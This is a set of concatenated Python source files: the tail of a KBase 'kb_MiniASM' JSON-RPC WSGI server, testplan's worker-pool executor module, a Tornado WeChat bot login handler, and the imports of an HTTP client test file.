if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'kb_MiniASM'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_kb_MiniASM.run_MiniASM,
name='kb_MiniASM.run_MiniASM',
types=[dict])
self.method_authentication['kb_MiniASM.run_MiniASM'] = 'required' # noqa
self.rpc_service.add(impl_kb_MiniASM.status,
name='kb_MiniASM.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'kb_MiniASM ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception, e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print 'Request method was %s\n' % environ['REQUEST_METHOD']
# print 'Environment dictionary is:\n%s\n' % pprint.pformat(environ)
# print 'Request body was: %s' % request_body
# print 'Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result)
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print "Monkeypatching std libraries for async"
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print "Listening on port %s" % port
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print "Host set to %s" % host
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print "Listening on port %s" % port
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
base.py
|
"""Worker pool executor base classes."""
import os
import numbers
import threading
import time
import datetime
import pprint
import traceback
import queue
from schema import Or, And, Use
from testplan.common.config import ConfigOption, validate_func
from testplan.common import entity
from testplan.common.remote.remote_resource import RemoteResource
from testplan.common.utils.path import rebase_path
from testplan.common.utils.thread import interruptible_join
from testplan.common.utils.timing import wait_until_predicate
from testplan.common.utils import strings
from testplan.runners.base import Executor, ExecutorConfig
from testplan.report import ReportCategories
from .communication import Message
from .connection import QueueClient, QueueServer
from .tasks import Task, TaskResult
from testplan.common.entity import ResourceStatus
class TaskQueue:
"""
A priority queue that returns items in the order of priority small -> large.
items with the same priority will be returned in the order they are added.
"""
def __init__(self):
self.q = queue.PriorityQueue()
self.count = 0
def put(self, priority, item):
self.q.put((priority, self.count, item))
self.count += 1
def get(self):
entry = self.q.get_nowait()
return entry[0], entry[2]
def __getattr__(self, name):
return self.q.__getattribute__(name)
class WorkerConfig(entity.ResourceConfig):
"""
Configuration object for
:py:class:`~testplan.runners.pools.base.Worker` resource entity.
"""
@classmethod
def get_options(cls):
"""
Schema for options validation and assignment of default values.
"""
return {
"index": Or(int, str),
ConfigOption("transport", default=QueueClient): object,
ConfigOption("restart_count", default=3): int,
}
class Worker(entity.Resource):
"""
Worker resource that pulls tasks from the transport provided, executes them
and sends back task results.
:param index: Worker index id.
:type index: ``int`` or ``str``
:param transport: Transport class for pool/worker communication.
:type transport: :py:class:`~testplan.runners.pools.connection.Client`
:param restart_count: How many times a worker in pool can be restarted.
:type restart_count: ``int``
Also inherits all :py:class:`~testplan.common.entity.base.Resource`
options.
"""
CONFIG = WorkerConfig
def __init__(self, **options):
super(Worker, self).__init__(**options)
self._metadata = None
self._transport = self.cfg.transport()
self._handler = None
self.last_heartbeat = None
self.assigned = set()
self.requesting = 0
self.restart_count = self.cfg.restart_count
@property
def handler(self):
return self._handler
@property
def transport(self):
"""Pool/Worker communication transport."""
return self._transport
@property
def metadata(self):
"""Worker metadata information."""
if not self._metadata:
self._metadata = {
"thread": threading.current_thread(),
"index": self.cfg.index,
}
return self._metadata
@property
def outfile(self):
"""Stdout file."""
return os.path.join(
self.parent.runpath, "{}_startup".format(self.cfg.index)
)
def uid(self):
"""Worker unique index."""
return self.cfg.index
def starting(self):
"""Starts the daemonic worker loop."""
self.make_runpath_dirs()
self._handler = threading.Thread(
target=self._loop, args=(self._transport,)
)
self._handler.daemon = True
self._handler.start()
self.status.change(self.STATUS.STARTED)
def stopping(self):
"""Stops the worker."""
if self._handler:
interruptible_join(self._handler)
self._handler = None
self.status.change(self.STATUS.STOPPED)
def aborting(self):
"""Aborting logic, will not wait running tasks."""
self._transport.disconnect()
@property
def is_alive(self):
"""Poll the loop handler thread to check it is running as expected."""
return self._handler.is_alive()
def _loop(self, transport):
message = Message(**self.metadata)
while self.active and self.status.tag not in (
self.status.STOPPING,
self.status.STOPPED,
):
received = transport.send_and_receive(
message.make(message.TaskPullRequest, data=1)
)
if received is None or received.cmd == Message.Stop:
break
elif received.cmd == Message.TaskSending:
results = []
for item in received.data:
results.append(self.execute(item))
transport.send_and_receive(
message.make(message.TaskResults, data=results),
expect=message.Ack,
)
elif received.cmd == Message.Ack:
pass
time.sleep(self.cfg.active_loop_sleep)
def execute(self, task):
"""
Executes a task and return the associated task result.
:param task: Task that worker pulled for execution.
:type task: :py:class:`~testplan.runners.pools.tasks.base.Task`
:return: Task result.
:rtype: :py:class:`~testplan.runners.pools.tasks.base.TaskResult`
"""
try:
runnable = task.materialize()
if isinstance(runnable, entity.Runnable):
if not runnable.parent:
runnable.parent = self
if not runnable.cfg.parent:
runnable.cfg.parent = self.cfg
result = runnable.run()
except BaseException:
task_result = TaskResult(
task=task,
result=None,
status=False,
reason=traceback.format_exc(),
)
else:
task_result = TaskResult(task=task, result=result, status=True)
return task_result
def respond(self, msg):
"""
Method that the pool uses to respond with a message to the worker.
:param msg: Response message.
:type msg: :py:class:`~testplan.runners.pools.communication.Message`
"""
self._transport.respond(msg)
def __repr__(self):
return "{}[{}]".format(self.__class__.__name__, self.cfg.index)
class PoolConfig(ExecutorConfig):
"""
Configuration object for
:py:class:`~testplan.runners.pools.base.Pool` executor resource entity.
"""
@classmethod
def get_options(cls):
"""
Schema for options validation and assignment of default values.
"""
return {
"name": str,
ConfigOption("size", default=4): And(int, lambda x: x > 0),
ConfigOption("worker_type", default=Worker): object,
ConfigOption("worker_heartbeat", default=None): Or(
int, float, None
),
ConfigOption("heartbeats_miss_limit", default=3): int,
ConfigOption("restart_count", default=3): int,
ConfigOption("max_active_loop_sleep", default=5): numbers.Number,
ConfigOption("allow_task_rerun", default=True): bool,
}
class Pool(Executor):
"""
Pool task executor object that initializes workers and dispatches tasks.
:param name: Pool name.
:type name: ``str``
:param size: Pool workers size. Default: 4
:type size: ``int``
:param worker_type: Type of worker to be initialized.
:type worker_type: :py:class:`~testplan.runners.pools.base.Worker`
:param worker_heartbeat: Worker heartbeat period.
:type worker_heartbeat: ``int`` or ``float`` or ``NoneType``
:param heartbeats_miss_limit: Maximum times a heartbeat is missed.
:type heartbeats_miss_limit: ``int``
:param restart_count: How many times a worker in pool can be restarted.
:type restart_count: ``int``
:param max_active_loop_sleep: Maximum value for delay logic in active sleep.
:type max_active_loop_sleep: ``int`` or ``float``
:param allow_task_rerun: Whether allow task to rerun when executing in this pool
:type allow_task_rerun: ``bool``
Also inherits all :py:class:`~testplan.runners.base.Executor` options.
"""
CONFIG = PoolConfig
CONN_MANAGER = QueueServer
def __init__(
self,
name,
size=4,
worker_type=Worker,
worker_heartbeat=None,
heartbeats_miss_limit=3,
restart_count=3,
max_active_loop_sleep=5,
allow_task_rerun=True,
**options
):
options.update(self.filter_locals(locals()))
super(Pool, self).__init__(**options)
self.unassigned = TaskQueue() # unassigned tasks
self._executed_tests = []
self._task_retries_cnt = {} # uid: times_reassigned_without_result
self._task_retries_limit = 2
self._workers = entity.Environment(parent=self)
self._workers_last_result = {}
self._conn = self.CONN_MANAGER()
self._conn.parent = self
self._pool_lock = threading.Lock()
self._metadata = None
# Set when Pool is started.
self._exit_loop = False
self._start_monitor_thread = True
# Methods for handling different Message types. These are expected to
# take the worker, request and response objects as the only required
# positional args.
self._request_handlers = {
Message.ConfigRequest: self._handle_cfg_request,
Message.TaskPullRequest: self._handle_taskpull_request,
Message.TaskResults: self._handle_taskresults,
Message.Heartbeat: self._handle_heartbeat,
Message.SetupFailed: self._handle_setupfailed,
}
def uid(self):
"""Pool name."""
return self.cfg.name
def add(self, task, uid):
"""
Add a task for execution.
:param task: Task to be scheduled to workers.
:type task: :py:class:`~testplan.runners.pools.tasks.base.Task`
:param uid: Task uid.
:type uid: ``str``
"""
if not isinstance(task, Task):
raise ValueError(
"Task was expected, got {} instead.".format(type(task))
)
super(Pool, self).add(task, uid)
self.unassigned.put(task.priority, uid)
self._task_retries_cnt[uid] = 0
def _can_assign_task(self, task):
"""
Is this pool able to execute the task.
:param task: Task to be scheduled to pool.
:type task: :py:class:`~testplan.runners.pools.tasks.base.Task`
:return: True if can assign task to pool, otherwise False
:rtype: ``bool``
"""
return True
def _can_assign_task_to_worker(self, task, worker):
"""
When a worker requests a task, it is necessary to verify that
the worker is suitable to execute the task.
:param task: Task to be scheduled to worker.
:type task: :py:class:`~testplan.runners.pools.tasks.base.Task`
:param worker: A worker created by pool executor.
:type worker: :py:class:`~testplan.runners.pools.base.Worker`
:return: True if can assign task to worker, otherwise False
:rtype: ``bool``
"""
return True
def _loop(self):
"""
Main executor work loop - runs in a separate thread when the Pool is
started.
"""
if self._start_monitor_thread:
self.logger.debug("Starting worker monitor thread.")
self._worker_monitor = threading.Thread(
target=self._workers_monitoring
)
self._worker_monitor.daemon = True
self._worker_monitor.start()
while self.active and not self._exit_loop:
msg = self._conn.accept()
if msg:
try:
self.handle_request(msg)
except Exception:
self.logger.error(traceback.format_exc())
time.sleep(self.cfg.active_loop_sleep)
def handle_request(self, request):
"""
Handles a worker request. I.e TaskPull, TaskResults, Heartbeat etc.
:param request: Worker request.
:type request: :py:class:`~testplan.runners.pools.communication.Message`
"""
sender_index = request.sender_metadata["index"]
worker = self._workers[sender_index]
self.logger.debug(
"Pool %s received message from worker %s - %s, %s",
self.cfg.name,
worker,
request.cmd,
request.data,
)
if not worker.active:
self.logger.warning(
"Message from inactive worker %s - %s, %s",
worker,
request.cmd,
request.data,
)
response = Message(**self._metadata)
if not self.active or self.status.tag == self.STATUS.STOPPING:
worker.respond(response.make(Message.Stop))
elif request.cmd in self._request_handlers:
try:
self._request_handlers[request.cmd](worker, request, response)
except Exception:
self.logger.error(traceback.format_exc())
self.logger.debug(
"Not able to handle request from worker, sending Stop cmd"
)
worker.respond(response.make(Message.Stop))
else:
self.logger.error(
"Unknown request: {} {} {} {}".format(
request, dir(request), request.cmd, request.data
)
)
worker.respond(response.make(Message.Ack))
def _handle_cfg_request(self, worker, _, response):
"""Handle a ConfigRequest from a worker."""
options = []
cfg = self.cfg
while cfg:
options.append(cfg.denormalize())
cfg = cfg.parent
worker.respond(response.make(Message.ConfigSending, data=options))
def _handle_taskpull_request(self, worker, request, response):
"""Handle a TaskPullRequest from a worker."""
tasks = []
if self.status.tag == self.status.STARTED:
for _ in range(request.data):
try:
priority, uid = self.unassigned.get()
except queue.Empty:
break
task = self._input[uid]
if self._can_assign_task(task):
if self._task_retries_cnt[uid] > self._task_retries_limit:
self._discard_task(
uid,
"{} already reached max retries limit: {}".format(
self._input[uid], self._task_retries_limit
),
)
continue
else:
if self._can_assign_task_to_worker(task, worker):
self.logger.test_info(
"Scheduling {} to {}{}".format(
task,
worker,
" (rerun {})".format(task.reassign_cnt)
if task.reassign_cnt > 0
else "",
)
)
worker.assigned.add(uid)
tasks.append(task)
task.executors.setdefault(self.cfg.name, set())
task.executors[self.cfg.name].add(worker.uid())
self.record_execution(uid)
else:
self.logger.test_info(
"Cannot schedule {} to {}".format(task, worker)
)
self.unassigned.put(task.priority, uid)
self._task_retries_cnt[uid] += 1
else:
# Later may create a default local pool as failover option
self._discard_task(
uid,
"{} cannot be executed in {}".format(
self._input[uid], self
),
)
if tasks:
worker.respond(response.make(Message.TaskSending, data=tasks))
worker.requesting = request.data - len(tasks)
return
worker.requesting = request.data
worker.respond(response.make(Message.Ack))
def _handle_taskresults(self, worker, request, response):
"""Handle a TaskResults message from a worker."""
def task_should_rerun():
if not self.cfg.allow_task_rerun:
return False
if not task_result.task:
return False
if task_result.task.rerun == 0:
return False
result = task_result.result
if (
task_result.status
and result
and result.run
and result.report.passed
):
return False
if task_result.task.reassign_cnt >= task_result.task.rerun:
self.logger.test_info(
"Will not rerun %(input)s again as it already "
"reached max rerun limit %(reruns)d",
{
"input": self._input[uid],
"reruns": task_result.task.rerun,
},
)
return False
return True
worker.respond(response.make(Message.Ack))
for task_result in request.data:
uid = task_result.task.uid()
worker.assigned.remove(uid)
self._workers_last_result.setdefault(worker, time.time())
self.logger.test_info(
"De-assign {} from {}".format(task_result.task, worker)
)
if isinstance(worker, RemoteResource):
for attachment in task_result.result.report.attachments:
attachment.source_path = rebase_path(
attachment.source_path,
worker._remote_plan_runpath,
worker._get_plan().runpath,
)
if task_should_rerun():
self.logger.test_info(
"Will rerun %(task)s for max %(rerun)d more times",
{
"task": task_result.task,
"rerun": task_result.task.rerun
- task_result.task.reassign_cnt,
},
)
self.unassigned.put(task_result.task.priority, uid)
self._task_retries_cnt[uid] = 0
self._input[uid].reassign_cnt += 1
# Will rerun task, but still need to retain the result
self._append_temporary_task_result(task_result)
continue
self._print_test_result(task_result)
self._results[uid] = task_result
self.ongoing.remove(uid)
def _handle_heartbeat(self, worker, request, response):
"""Handle a Heartbeat message received from a worker."""
worker.last_heartbeat = time.time()
self.logger.debug(
"Received heartbeat from {} at {} after {}s.".format(
worker, request.data, time.time() - request.data
)
)
worker.respond(response.make(Message.Ack, data=worker.last_heartbeat))
def _handle_setupfailed(self, worker, request, response):
"""Handle a SetupFailed message received from a worker."""
self.logger.test_info(
"Worker {} setup failed:{}{}".format(
worker, os.linesep, request.data
)
)
worker.respond(response.make(Message.Ack))
self._decommission_worker(worker, "Aborting {}, setup failed.")
def _decommission_worker(self, worker, message):
"""
Decommission a worker by move all assigned task back to pool
"""
self.logger.critical(message.format(worker))
if os.path.exists(worker.outfile):
self.logger.critical("\tlogfile: {}".format(worker.outfile))
while worker.assigned:
uid = worker.assigned.pop()
task = self._input[uid]
self.logger.test_info(
"Re-collect {} from {} to {}.".format(task, worker, self)
)
self.unassigned.put(task.priority, uid)
self._task_retries_cnt[uid] += 1
def _workers_monitoring(self):
"""
Worker fault tolerance logic. Check is based on:
1) handler status
2) heartbeat if available
"""
previous_status = {"active": [], "inactive": [], "initializing": []}
loop_interval = self.cfg.worker_heartbeat or 5 # seconds
break_outer_loop = False
while self.active:
hosts_status = {"active": [], "inactive": [], "initializing": []}
for worker in self._workers:
status, reason = self._query_worker_status(worker)
if status == "inactive":
with self._pool_lock:
if self.active and self.status.tag not in (
self.status.STOPPING,
self.status.STOPPED,
):
if self._handle_inactive(worker, reason):
status = "active"
else:
# if pool is aborting/stopping, exit monitor
break_outer_loop = True
break
hosts_status[status].append(worker)
if break_outer_loop:
break
if hosts_status != previous_status:
self.logger.info(
"%s Hosts status update", datetime.datetime.now()
)
self.logger.info(pprint.pformat(hosts_status))
previous_status = hosts_status
if (
not hosts_status["active"]
and not hosts_status["initializing"]
and hosts_status["inactive"]
):
self.logger.critical(
"All workers of {} are inactive.".format(self)
)
self.abort()
break
try:
# For early finish of worker monitoring thread.
wait_until_predicate(
lambda: not self.is_alive,
timeout=loop_interval,
interval=0.05,
)
except RuntimeError:
break
def _query_worker_status(self, worker):
"""
Query the current status of a worker. If heartbeat monitoring is
enabled, check the last heartbeat time is within threshold.
:param worker: Pool worker to query
:return: worker status string - one of 'initializing', 'inactive' or
'active', and an optional reason string
"""
if not worker.active or worker.status.tag in (
worker.status.STOPPING,
worker.status.STOPPED,
):
return "inactive", "Worker {} in stop/abort status"
if worker.status.tag in (worker.status.NONE, worker.status.STARTING):
return "initializing", None
# else: worker must be in state STARTED
if worker.status.tag != worker.status.STARTED:
raise RuntimeError(
"Worker in unexpected state {}".format(worker.status.tag)
)
if not worker.is_alive: # handler based monitoring
return (
"inactive",
"Decommission {}, handler no longer alive".format(worker),
)
# If no heartbeart is configured, we treat the worker as "active"
# since it is in state STARTED and its handler is alive.
if not self.cfg.worker_heartbeat:
return "active", None
# else: do heartbeat based monitoring
lag = time.time() - worker.last_heartbeat
if lag > self.cfg.worker_heartbeat * self.cfg.heartbeats_miss_limit:
return (
"inactive",
"Has not been receiving heartbeat from {} for {} "
"sec".format(worker, lag),
)
return "active", None
def _handle_inactive(self, worker, reason):
"""
Handle an inactive worker.
:param worker: worker object
:type worker: :py:class:`~testplan.runners.pool.base.Worker`
:param reason: why worker is considered inactive
:type reason: ``str``
:return: True if worker restarted, else False
:rtype: ``bool``
"""
if worker.status.tag != worker.status.STARTED:
return False
self._decommission_worker(worker, reason)
if worker.restart_count:
worker.restart_count -= 1
try:
worker.restart()
return True
except Exception as exc:
self.logger.critical(
"Worker {} failed to restart: {}".format(worker, exc)
)
else:
worker.abort()
return False
def _discard_task(self, uid, reason):
self.logger.critical(
"Discard task {} of {} - {}.".format(
self._input[uid], self, reason
)
)
self._results[uid] = TaskResult(
task=self._input[uid],
status=False,
reason="Task discarded by {} - {}.".format(self, reason),
)
self.ongoing.remove(uid)
def _discard_pending_tasks(self):
self.logger.critical("Discard pending tasks of {}.".format(self))
while self.ongoing:
uid = self.ongoing[0]
self._results[uid] = TaskResult(
task=self._input[uid],
status=False,
reason="Task [{}] discarding due to {} abort.".format(
self._input[uid]._target, self
),
)
self.ongoing.pop(0)
def _append_temporary_task_result(self, task_result):
"""If a task should rerun, append the task result already fetched."""
test_report = task_result.result.report
uid = task_result.task.uid()
if uid not in self._task_retries_cnt:
return
postfix = " => Run {}".format(task_result.task.reassign_cnt)
test_report.name = "{}{}".format(test_report.name, postfix)
test_report.uid = "{}{}".format(test_report.uid, postfix)
test_report.category = ReportCategories.TASK_RERUN
test_report.status_override = "xfail"
new_uuid = strings.uuid4()
self._results[new_uuid] = task_result
self.parent._tests[new_uuid] = self.cfg.name
self.record_execution(new_uuid)
def _print_test_result(self, task_result):
if (not isinstance(task_result.result, entity.RunnableResult)) or (
not hasattr(task_result.result, "report")
):
return
# Currently prints report top level result and not details.
name = task_result.result.report.name
self.logger.log_test_status(name, task_result.result.report.status)
def _add_workers(self):
"""Initialise worker instances."""
for idx in (str(i) for i in range(self.cfg.size)):
worker = self.cfg.worker_type(
index=idx,
restart_count=self.cfg.restart_count,
active_loop_sleep=0.01,
)
worker.parent = self
worker.cfg.parent = self.cfg
self._workers.add(worker, uid=idx)
self.logger.debug(
"Added worker %(index)s (outfile = %(outfile)s)",
{"index": idx, "outfile": worker.outfile},
)
def _start_workers(self):
"""Start all workers of the pool"""
for worker in self._workers:
self._conn.register(worker)
self._workers.start()
def starting(self):
"""Starting the pool and workers."""
# TODO do we need a lock here?
self.make_runpath_dirs()
if self.runpath is None:
raise RuntimeError("runpath was not set correctly")
self._metadata = {"runpath": self.runpath}
self._conn.start()
for worker in self._workers:
# reset worker (if any) status
worker.status.change(ResourceStatus.STARTING)
self._exit_loop = False
super(Pool, self).starting() # start the loop & monitor
if not self._workers:
self._add_workers()
self._start_workers()
if self._workers.start_exceptions:
for msg in self._workers.start_exceptions.values():
self.logger.error(msg)
self.abort()
raise RuntimeError(
"All workers of {} failed to start.".format(self)
)
self.status.change(self.status.STARTED)
self.logger.debug("%s started.", self.__class__.__name__)
def workers_requests(self):
"""Count how many tasks workers are requesting."""
return sum(worker.requesting for worker in self._workers)
def _stop_workers(self):
self._workers.stop()
def stopping(self):
"""Stop connections and workers."""
with self._pool_lock:
self._stop_workers()
for worker in self._workers:
worker.transport.disconnect()
self._exit_loop = True
super(Pool, self).stopping() # stop the loop and the monitor
self._conn.stop()
self.status.change(self.status.STOPPED)
self.logger.debug("Stopped %s", self.__class__.__name__)
def abort_dependencies(self):
"""Empty generator to override parent implementation."""
return
yield
def aborting(self):
"""Aborting logic."""
self.logger.debug("Aborting pool {}".format(self))
for worker in self._workers:
worker.abort()
super(Pool, self).stopping() # stop the loop and the monitor
self._conn.abort()
self._discard_pending_tasks()
self.logger.debug("Aborted pool {}".format(self))
def record_execution(self, uid):
self._executed_tests.append(uid)
|
WxLoginHandler.py
|
#! /usr/bin/python
# -*- coding:utf-8 -*-
"""
Author: AsherYang
Email: ouyangfan1991@gmail.com
Date: 2018/7/1
Desc: 用于登录运维微信
本类基于wxpy 以及 wechat_sender 同时结合自己weichatutil(私有pypi源) 进行搭建
注意:
1. 后台监听账号需要事先登录
2. 接受者,必须是后台监听的微信号的好友,才能成功发送消息
"""
import sys
sys.path.append('../')
import tornado.web
from tornado.web import asynchronous
from BaseResponse import BaseResponse
from constant import ResponseCode
from FFStoreJsonEncoder import *
from util.WxBotUtil import WxBotUtil, def_qr_path
from util.LogUtil import LogUtil
import threading
import os
class WxLoginHandler(tornado.web.RequestHandler):
def get(self, *args, **kwargs):
wxBot = WxBotUtil()
# wxBot.login_by_thread()
thr = threading.Thread(target=wxBot) # open new thread, args=[sms_msg], thread move to WxBotUtil
thr.start()
qr_path = '../static/qrcode/qrcode.png'
self.redirect(qr_path)
# self.render('qrcode.html', qr_path=qr_path)
# self.scan_qr(qr_path='/work/ffstore_server/ffstore/static/qrcode/qrcode.png')
# 因为WxBotUtil中 bot 是线程阻塞类型,所以回调回来会出现问题, 直接redirect 到二维码静态页面
# def scan_qr(self, **kwargs):
# qr_path = str(kwargs['qr_path'])
# logging = LogUtil().getLogging()
# logging.info('---> qrcPath: ' + qr_path)
# logging.info('--------------------------------------')
# # qr_path = '/work/ffstore_server/ffstore/static/qrcode/qrcode.png'
# if os.path.exists(qr_path) and qr_path.find('static') != -1:
# qr_code_path = qr_path[qr_path.find('static')+7:]
# logging.info('---> do qrcPath: ' + qr_code_path)
# logging.info('-----------------111111111---------------------')
# # self.render('1111111111111111111111')
# # return self.render('qrcode.html', qr_path=qr_code_path)
# # # qr_path = 'qrcode/qrcode.png'
# else:
# baseResponse = BaseResponse()
# baseResponse.code = ResponseCode.fail_wx_bot_login
# baseResponse.desc = ResponseCode.fail_wx_bot_login_desc
# json_str = json.dumps(baseResponse, cls=StrEncoder)
# self.write(json_str)
# self.finish()
|
test_httpclient.py
|
#!/usr/bin/env python2
# coding: utf-8
import gc
import os
import socket
import ssl
import threading
import time
import unittest
from BaseHTTPServer import BaseHTTPRequestHandler
from BaseHTTPServer import HTTPServer
